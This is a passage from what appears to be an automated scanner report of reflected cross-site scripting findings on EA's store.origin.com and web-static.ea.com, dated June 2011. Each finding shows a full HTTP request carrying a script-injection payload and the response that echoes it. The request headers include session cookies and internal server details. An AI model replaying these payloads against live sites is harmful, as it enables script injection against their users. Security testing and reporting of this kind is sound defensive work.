<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=7130d483&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&cba28--><script>alert(1)</script>988e2a37d0c=1&ceid=173716600&cename=TopHeader&id=ProductDetailsPage&productID=201797000&script>
...[SNIP]...

4.95. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69277--><script>alert(1)</script>db7d3c456c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/home/?69277--><script>alert(1)</script>db7d3c456c5=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/home/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=215059140235,0)
Date: Fri, 24 Jun 2011 14:38:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926339848:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?69277--><script>alert(1)</script>db7d3c456c5=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...

4.96. http://web-static.ea.com/us/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f68b"><script>alert(1)</script>bb832b5d563 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/8f68b"><script>alert(1)</script>bb832b5d563?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30469
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:14 GMT
Date: Fri, 24 Jun 2011 14:09:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/8f68b"><script>alert(1)</script>bb832b5d563" />
...[SNIP]...

4.97. http://web-static.ea.com/us/portal/css/base/js-dependant/game_gamefeatures.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/game_gamefeatures.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e510"><script>alert(1)</script>5089f3d5a79 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/7e510"><script>alert(1)</script>5089f3d5a79?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/7e510"><script>alert(1)</script>5089f3d5a79" />
...[SNIP]...

4.98. http://web-static.ea.com/us/portal/css/base/js-dependant/hideOnLoad.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/hideOnLoad.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483be"><script>alert(1)</script>ad62f3e1566 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/483be"><script>alert(1)</script>ad62f3e1566?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/483be"><script>alert(1)</script>ad62f3e1566" />
...[SNIP]...

4.99. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-facebox.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery-facebox.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2565"><script>alert(1)</script>c7ff191df6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/a2565"><script>alert(1)</script>c7ff191df6?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30497
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/a2565"><script>alert(1)</script>c7ff191df6" />
...[SNIP]...

4.100. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-ui.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery-ui.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d142"><script>alert(1)</script>69d8b1784d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/9d142"><script>alert(1)</script>69d8b1784d3?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/9d142"><script>alert(1)</script>69d8b1784d3" />
...[SNIP]...

4.101. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.eventcalendar.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.eventcalendar.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8628d"><script>alert(1)</script>fd4414aa5ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/8628d"><script>alert(1)</script>fd4414aa5ab?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/8628d"><script>alert(1)</script>fd4414aa5ab" />
...[SNIP]...

4.102. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.pagination.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.pagination.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab03"><script>alert(1)</script>4c01e624c5d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/7ab03"><script>alert(1)</script>4c01e624c5d?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/7ab03"><script>alert(1)</script>4c01e624c5d" />
...[SNIP]...

4.103. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.slider.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.slider.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2927e"><script>alert(1)</script>b1174e8b08a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/2927e"><script>alert(1)</script>b1174e8b08a?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/2927e"><script>alert(1)</script>b1174e8b08a" />
...[SNIP]...

4.104. http://web-static.ea.com/us/portal/css/base/reset.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/reset.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a45"><script>alert(1)</script>5f2c5191043 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/a9a45"><script>alert(1)</script>5f2c5191043?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/a9a45"><script>alert(1)</script>5f2c5191043" />
...[SNIP]...

4.105. http://web-static.ea.com/us/portal/css/base/utils.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/utils.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79f2e"><script>alert(1)</script>d4820574afe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/79f2e"><script>alert(1)</script>d4820574afe?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:46 GMT
Date: Fri, 24 Jun 2011 13:43:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/79f2e"><script>alert(1)</script>d4820574afe" />
...[SNIP]...

4.106. http://web-static.ea.com/us/portal/css/ea_global_footer.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/ea_global_footer.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d055d"><script>alert(1)</script>b0f25b5562f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/d055d"><script>alert(1)</script>b0f25b5562f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30479
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/d055d"><script>alert(1)</script>b0f25b5562f" />
...[SNIP]...

4.107. http://web-static.ea.com/us/portal/css/ea_gus.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/ea_gus.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48ee"><script>alert(1)</script>3c17de4adf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/d48ee"><script>alert(1)</script>3c17de4adf6?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/d48ee"><script>alert(1)</script>3c17de4adf6" />
...[SNIP]...

4.108. http://web-static.ea.com/us/portal/css/gui.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/gui.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18290"><script>alert(1)</script>dd234103871 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/18290"><script>alert(1)</script>dd234103871?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:45 GMT
Date: Fri, 24 Jun 2011 13:43:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/18290"><script>alert(1)</script>dd234103871" />
...[SNIP]...

4.109. http://web-static.ea.com/us/portal/css/layout.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/layout.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 390e9"><script>alert(1)</script>ff23a62e26f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/390e9"><script>alert(1)</script>ff23a62e26f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
